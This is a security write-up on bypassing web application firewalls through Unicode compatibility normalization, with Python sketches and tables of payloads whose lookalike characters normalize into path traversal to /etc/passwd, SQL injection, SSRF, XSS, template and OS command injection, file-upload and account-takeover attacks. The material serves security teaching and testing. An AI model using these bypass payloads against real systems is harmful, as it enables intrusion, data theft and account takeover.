# WAF Bypassing with Unicode Compatibility

[**https://jlajara.gitlab.io/Bypass\_WAF\_Unicode**](https://jlajara.gitlab.io/Bypass_WAF_Unicode)

**Unicode Compatibility** is a form of *Unicode Equivalence* under which characters or character sequences that may look or behave differently are treated as representing the same abstract character. For example, `𝕃` is normalized to `L`. This behaviour can be abused against weak implementations that *perform Unicode compatibility normalization after the input has been sanitized*.
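The ordering problem can be sketched in a few lines of Python. This is only an illustration, assuming a naive deny-list filter and NFKC as the normalization form; `filter_rejects`, `vulnerable_pipeline` and `safer_pipeline` are hypothetical names, not part of any real WAF.

```python
import unicodedata

BLOCKED = ("<", ">")  # hypothetical deny-list of a naive filter


def filter_rejects(value: str) -> bool:
    """Return True if the naive filter would reject the value."""
    return any(ch in value for ch in BLOCKED)


def vulnerable_pipeline(value: str) -> str:
    # Filter first, normalize afterwards: the weak ordering described above.
    if filter_rejects(value):
        raise ValueError("blocked")
    return unicodedata.normalize("NFKC", value)


def safer_pipeline(value: str) -> str:
    # Normalize first, so the filter inspects what the application will use.
    normalized = unicodedata.normalize("NFKC", value)
    if filter_rejects(normalized):
        raise ValueError("blocked")
    return normalized


payload = "\uff1cscript\uff1e"  # fullwidth "<" and ">" around "script"
print(vulnerable_pipeline(payload))  # the filter saw no "<", the app gets "<script>"
```

With the same payload, `safer_pipeline` raises `ValueError`, because the filter runs on the already normalized string.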

### How to find normalized characters? <a href="#how-to-find-normalized-characters" id="how-to-find-normalized-characters"></a>

To find the characters that map to a given character after Unicode compatibility normalization, this resource can be used:

* <https://www.compart.com/en/unicode>

Searching for a character shows the characters that are equivalent to it after compatibility normalization. For example, the character `<` - <https://www.compart.com/en/unicode/U+003C>

![Compart](https://jlajara.gitlab.io/assets/images/posts/20200219/3.png)

The page shows these three characters: `≮`,`﹤` and `＜`. Clicking each one shows, in the *Decomposition* section, how it is normalized:

* `≮` - `<` (U+003C) - `◌̸` (U+0338)
* `﹤` - `<` (U+003C)
* `＜` - `<` (U+003C)

In this case the character `≮` would not achieve the desired functionality, because its decomposition also introduces the combining character `◌̸` (U+0338), which would break the payload.
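The same lookup can be approximated locally. The sketch below assumes Python's standard `unicodedata` module and NFKC as the target normalization form; `compat_equivalents` is a hypothetical helper, and its results depend on the Unicode version bundled with the interpreter.

```python
import sys
import unicodedata


def compat_equivalents(target: str) -> list[str]:
    """Return characters other than `target` whose NFKC form is exactly `target`."""
    found = []
    for cp in range(sys.maxunicode + 1):
        ch = chr(cp)
        if ch != target and unicodedata.normalize("NFKC", ch) == target:
            found.append(ch)
    return found


# List every single character that normalizes to a clean "<".
for ch in compat_equivalents("<"):
    print(f"U+{ord(ch):04X} {unicodedata.name(ch, '?')}")

# U+226E decomposes into "<" plus a combining mark, so it is not a clean match.
print([f"U+{ord(c):04X}" for c in unicodedata.normalize("NFKD", "\u226e")])
```

Requiring the normalized form to equal the target exactly filters out characters such as `≮`, whose decomposition carries extra code points.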

### Exploiting other vulnerabilities <a href="#exploiting-other-vulnerabilities" id="exploiting-other-vulnerabilities"></a>

Many custom payloads can be crafted if normalization is performed. Here are some ideas:

* **Path Traversal**

| Character  | Payload          | After Normalization |
| ---------- | ---------------- | ------------------- |
| ‥ (U+2025) | ‥/‥/‥/etc/passwd | ../../../etc/passwd |
| ︰(U+FE30)  | ︰/︰/︰/etc/passwd | ../../../etc/passwd |

* **SQL Injection**

| Character  | Payload     | After Normalization |
| ---------- | ----------- | ------------------- |
| ＇(U+FF07)  | ＇ or ＇1＇=＇1 | `' or '1'='1`       |
| ＂(U+FF02)  | ＂ or ＂1＂=＂1 | `" or "1"="1`       |
| ﹣ (U+FE63) | admin＇﹣﹣    | `admin'--`          |

* **Server Side Request Forgery (SSRF)**

| Character  | Payload   | After Normalization |
| ---------- | --------- | ------------------- |
| ⓪ (U+24EA) | ①②⑦.⓪.⓪.① | 127.0.0.1           |

* **Open Redirect**

| Character | Payload             | After Normalization |
| --------- | ------------------- | ------------------- |
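| 。(U+3002) | jlajara。gitlab。io   | jlajara.gitlab.io   |
| ／(U+FF0F) | ／／jlajara.gitlab.io | //jlajara.gitlab.io |

Note that `。` (U+3002) has no compatibility decomposition of its own. It is typically turned into `.` by IDNA host name processing (UTS #46 mapping), as applied by browsers, and not by NFKC normalization.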

* **XSS**

| Character | Payload              | After Normalization  |
| --------- | -------------------- | -------------------- |
| ＜(U+FF1C) | ＜script src=a／＞      | `<script src=a/>`    |
| ＂(U+FF02) | ＂onclick=＇prompt(1)＇ | `"onclick='prompt(1)'` |

* **Template Injection**

| Character  | Payload | After Normalization |
| ---------- | ------- | ------------------- |
| ﹛(U+FE5B)  | ﹛﹛3+3﹜﹜ | {{3+3}}             |
| ［ (U+FF3B) | ［［5+5］］ | \[\[5+5]]           |

* **OS Command Injection**

| Character  | Payload   | After Normalization |
| ---------- | --------- | ------------------- |
| ＆ (U+FF06) | ＆＆whoami  | &&whoami            |
| ｜ (U+FF5C) | ｜｜ whoami | \|\| whoami         |

* **Arbitrary file upload**

| Character             | Payload  | After Normalization |
| --------------------- | -------- | ------------------- |
| ｐ (U+FF50) ʰ (U+02B0) | test.ｐʰｐ | test.php            |
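Several of the rows in the tables above can be checked with a short script. This is a minimal sketch that assumes the target applies NFKC (other forms or custom mappings may behave differently); `CASES` and `check` are hypothetical names, and the payloads are written as escapes so the exact code points are unambiguous.

```python
import unicodedata

# Payload -> expected result, taken from the tables in this section.
CASES = {
    "\u2025/\u2025/\u2025/etc/passwd": "../../../etc/passwd",  # two dot leader
    "\u2460\u2461\u2466.\u24ea.\u24ea.\u2460": "127.0.0.1",    # circled digits
    "admin\uff07\ufe63\ufe63": "admin'--",                     # fullwidth ', small -
    "\ufe5b\ufe5b3+3\ufe5c\ufe5c": "{{3+3}}",                  # small curly brackets
    "\uff06\uff06whoami": "&&whoami",                          # fullwidth ampersand
    "test.\uff50\u02b0\uff50": "test.php",                     # fullwidth p, modifier h
}


def check(cases: dict[str, str]) -> dict[str, bool]:
    """Map each payload to whether its NFKC form equals the expected string."""
    return {
        payload: unicodedata.normalize("NFKC", payload) == expected
        for payload, expected in cases.items()
    }


for payload, ok in check(CASES).items():
    print("OK  " if ok else "FAIL", payload.encode("unicode_escape").decode())
```

A row reported as `FAIL` would mean the character does not survive NFKC the way the table suggests on the local Unicode version, which is worth knowing before relying on it.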

* **Business logic**

Register a user whose name contains characters that normalize to those of an existing user. The registration may succeed because the username is not normalized at this step and the character is allowed. Then suppose the application normalizes the username when it later retrieves the user data.

* **1.** Register `ªdmin`. There is no such entry in the database, so registration succeeds.
* **2.** Log in as `ªdmin`. The backend performs normalization and returns the data of `admin`.
* **3.** Account takeover.

| Character  | Payload | After Normalization |
| ---------- | ------- | ------------------- |
| ª (U+00AA) | ªdmin   | admin               |
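The account takeover flow can be modelled with a toy user store. Everything here is an assumption for illustration: the in-memory `users` dict, the `register` and `login` functions, and the choice of NFKC at login time are hypothetical and only mimic the inconsistent handling described above.

```python
import unicodedata

# Hypothetical user store: raw username -> password.
users = {"admin": "admin-secret"}


def register(name: str, password: str) -> bool:
    # Uniqueness is checked on the raw name, without normalization.
    if name in users:
        return False
    users[name] = password
    return True


def login(name: str, password: str):
    # The password is verified against the raw name ...
    if users.get(name) != password:
        return None
    # ... but the session is bound to the normalized name.
    return unicodedata.normalize("NFKC", name)


attacker = "\u00aadmin"  # FEMININE ORDINAL INDICATOR followed by "dmin"
print(register(attacker, "attacker-pw"))  # True: no raw "ªdmin" entry exists yet
print(login(attacker, "attacker-pw"))     # admin
```

Normalizing the username once, before both the uniqueness check and every later lookup, would make the second registration collide with `admin` and fail.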

Reference:

{% embed url="<https://jlajara.gitlab.io/web/2020/02/19/Bypass_WAF_Unicode.html>" %}
